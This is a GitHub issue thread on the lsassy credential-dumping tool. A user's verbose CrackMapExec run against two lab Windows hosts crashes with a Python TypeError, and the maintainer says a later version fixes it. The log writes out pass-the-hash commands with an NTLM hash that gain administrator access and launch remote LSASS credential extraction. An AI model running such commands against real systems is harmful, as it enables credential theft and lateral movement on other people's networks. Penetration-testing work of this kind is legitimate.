search

login-securite / lsassy

Extract credentials from lsass remotely
https://en.hackndo.com/remote-lsass-dump-passwords/
MIT License
2.05k stars 247 forks source link

Issue with lsassy Module on CrackMapExec 5.0.0dev #32

Closed 0rx1 closed 4 years ago

0rx1 commented 4 years ago 
➜  ~ pipenv run crackmapexec --verbose smb /root/Desktop/Pentest/targets.txt -u 'Administrator' -H 'aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd' -d CEH -M lsassy -o METHOD=1 BLOODHOUND=true NEO4JPASS=toor
DEBUG Passed args:
{'clear_obfscripts': False,
 'content': False,
 'continue_on_success': False,
 'cred_id': [],
 'darrell': False,
 'depth': None,
 'disks': False,
 'domain': 'CEH',
 'exclude_dirs': '',
 'exec_method': None,
 'execute': None,
 'fail_limit': None,
 'force_ps32': False,
 'gen_relay_list': None,
 'gfail_limit': None,
 'groups': None,
 'hash': ['aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd'],
 'jitter': None,
 'list_modules': False,
 'local_auth': False,
 'local_groups': None,
 'loggedon_users': False,
 'lsa': False,
 'module': 'lsassy',
 'module_options': ['METHOD=1', 'BLOODHOUND=true', 'NEO4JPASS=toor'],
 'no_output': False,
 'ntds': None,
 'obfs': False,
 'only_files': False,
 'pass_pol': False,
 'password': [],
 'pattern': None,
 'port': 445,
 'protocol': 'smb',
 'ps_execute': None,
 'regex': None,
 'rid_brute': None,
 'sam': False,
 'server': 'https',
 'server_host': '0.0.0.0',
 'server_port': None,
 'sessions': False,
 'share': 'C$',
 'shares': False,
 'show_module_options': False,
 'spider': None,
 'spider_folder': '.',
 'target': ['/root/Desktop/Pentest/targets.txt'],
 'threads': 100,
 'timeout': None,
 'ufail_limit': None,
 'username': ['Administrator'],
 'users': None,
 'verbose': True,
 'wmi': None,
 'wmi_namespace': 'root\\cimv2'}
SMB         192.168.1.200   445    WIN12-SERVER     [*] Windows Server 2012 R2 Datacenter 9600 x64 (name:WIN12-SERVER) (domain:CEH) (signing:True) (SMBv1:True)
SMB         192.168.1.250   445    PC               [*] Windows 7 Professional 7600 x64 (name:PC) (domain:CEH) (signing:False) (SMBv1:True)
DEBUG add_credential(credtype=hash, domain=CEH, username=Administrator, password=aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd, groupid=None, pillaged_from=None) => None
SMB         192.168.1.200   445    WIN12-SERVER     [+] CEH\Administrator aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd (Pwn3d!)
DEBUG [#0000]  C: <RESOLVE> Address(host='127.0.0.1', port=7687)
DEBUG [#0000]  C: <OPEN> ('127.0.0.1', 7687)
DEBUG [#E306]  C: <SECURE> 127.0.0.1
DEBUG [#E306]  C: <MAGIC> 0x6060B017
DEBUG [#E306]  C: <HANDSHAKE> 0x00000003 0x00000002 0x00000001 0x00000000
DEBUG [#E306]  S: <HANDSHAKE> 0x00000003
DEBUG [#E306]  C: HELLO {'user_agent': 'neobolt/1.7.16 Python/3.7.6-final-0 (linux)', 'scheme': 'basic', 'principal': 'neo4j', 'credentials': '*******'}
DEBUG [#E306]  S: SUCCESS {'server': 'Neo4j/3.5.3', 'connection_id': 'bolt-5'}
DEBUG [#E306]  C: BEGIN {}
DEBUG [#E306]  C: RUN 'MATCH (c:Computer {name:"WIN12-SERVER.CEH"}) SET c.owned=True RETURN c.name AS name' {} {}
DEBUG [#E306]  C: PULL_ALL
DEBUG [#E306]  S: SUCCESS {}
DEBUG [#E306]  S: SUCCESS {'t_first': 1, 'fields': ['name']}
DEBUG [#E306]  S: SUCCESS {'type': 'rw', 't_last': 0}
DEBUG [#E306]  C: COMMIT
DEBUG [#E306]  S: SUCCESS {'bookmark': 'neo4j:bookmark:v1:tx340'}
LSASSY      192.168.1.200   445    WIN12-SERVER     [-] Node WIN12-SERVER.CEH does not appear to be in Neo4J database. Have you imported correct data ?
DEBUG [#E306]  C: GOODBYE
DEBUG [#E306]  C: <CLOSE>
LSASSY      192.168.1.200   445    WIN12-SERVER     [*] Parsing lsass with lsassy
DEBUG Lsassy command : lsassy --format json -d 'CEH' -u 'Administrator' -p '' -H 'aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd' 192.168.1.200 -vv  --method 1
DEBUG add_credential(credtype=hash, domain=CEH, username=Administrator, password=aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd, groupid=None, pillaged_from=None) => None
SMB         192.168.1.250   445    PC               [+] CEH\Administrator aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd (Pwn3d!)
DEBUG [#0000]  C: <RESOLVE> Address(host='127.0.0.1', port=7687)
DEBUG [#0000]  C: <OPEN> ('127.0.0.1', 7687)
DEBUG [#E30A]  C: <SECURE> 127.0.0.1
DEBUG [#E30A]  C: <MAGIC> 0x6060B017
DEBUG [#E30A]  C: <HANDSHAKE> 0x00000003 0x00000002 0x00000001 0x00000000
DEBUG [#E30A]  S: <HANDSHAKE> 0x00000003
DEBUG [#E30A]  C: HELLO {'user_agent': 'neobolt/1.7.16 Python/3.7.6-final-0 (linux)', 'scheme': 'basic', 'principal': 'neo4j', 'credentials': '*******'}
DEBUG [#E30A]  S: SUCCESS {'server': 'Neo4j/3.5.3', 'connection_id': 'bolt-6'}
DEBUG [#E30A]  C: BEGIN {}
DEBUG [#E30A]  C: RUN 'MATCH (c:Computer {name:"PC.CEH"}) SET c.owned=True RETURN c.name AS name' {} {}
DEBUG [#E30A]  C: PULL_ALL
DEBUG [#E30A]  S: SUCCESS {}
DEBUG [#E30A]  S: SUCCESS {'t_first': 1, 'fields': ['name']}
DEBUG [#E30A]  S: SUCCESS {'type': 'rw', 't_last': 0}
DEBUG [#E30A]  C: COMMIT
DEBUG [#E30A]  S: SUCCESS {'bookmark': 'neo4j:bookmark:v1:tx340'}
LSASSY      192.168.1.250   445    PC               [-] Node PC.CEH does not appear to be in Neo4J database. Have you imported correct data ?
DEBUG [#E30A]  C: GOODBYE
DEBUG [#E30A]  C: <CLOSE>
LSASSY      192.168.1.250   445    PC               [*] Parsing lsass with lsassy
DEBUG Lsassy command : lsassy --format json -d 'CEH' -u 'Administrator' -p '' -H 'aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd' 192.168.1.250 -vv  --method 1
DEBUG ----- lsassy output -----
Traceback (most recent call last):
  File "src/gevent/greenlet.py", line 766, in gevent._greenlet.Greenlet.run
  File "/usr/lib/python3/dist-packages/cme/protocols/smb.py", line 110, in __init__
    connection.__init__(self, args, db, host)
  File "/usr/lib/python3/dist-packages/cme/connection.py", line 42, in __init__
    self.proto_flow()
  File "/usr/lib/python3/dist-packages/cme/connection.py", line 76, in proto_flow
    self.call_modules()
  File "/usr/lib/python3/dist-packages/cme/connection.py", line 106, in call_modules
    self.module.on_admin_login(context, self)
  File "/usr/lib/python3/dist-packages/cme/modules/lsassy.py", line 120, in on_admin_login
    for line in out.split("\n"):
TypeError: a bytes-like object is required, not 'str'
2020-02-09T14:27:07Z <Greenlet at 0x7f2a2c5c5dd0: smb(Namespace(clear_obfscripts=False, content=False, c, <protocol.database object at 0x7f2a2c3a0e10>, '192.168.1.200')> failed with TypeError

DEBUG ----- lsassy output -----
Traceback (most recent call last):
  File "src/gevent/greenlet.py", line 766, in gevent._greenlet.Greenlet.run
  File "/usr/lib/python3/dist-packages/cme/protocols/smb.py", line 110, in __init__
    connection.__init__(self, args, db, host)
  File "/usr/lib/python3/dist-packages/cme/connection.py", line 42, in __init__
    self.proto_flow()
  File "/usr/lib/python3/dist-packages/cme/connection.py", line 76, in proto_flow
    self.call_modules()
  File "/usr/lib/python3/dist-packages/cme/connection.py", line 106, in call_modules
    self.module.on_admin_login(context, self)
  File "/usr/lib/python3/dist-packages/cme/modules/lsassy.py", line 120, in on_admin_login
    for line in out.split("\n"):
TypeError: a bytes-like object is required, not 'str'
2020-02-09T14:27:12Z <Greenlet at 0x7f2a2d2505f0: smb(Namespace(clear_obfscripts=False, content=False, c, <protocol.database object at 0x7f2a2c3a0e10>, '192.168.1.250')> failed with TypeError
Hackndo commented 4 years ago

I'll update CME module so it works with python3

Hackndo commented 4 years ago

Fixed in lsassy 2.0.3 Use lsassy3.py in CME module for CME5 and above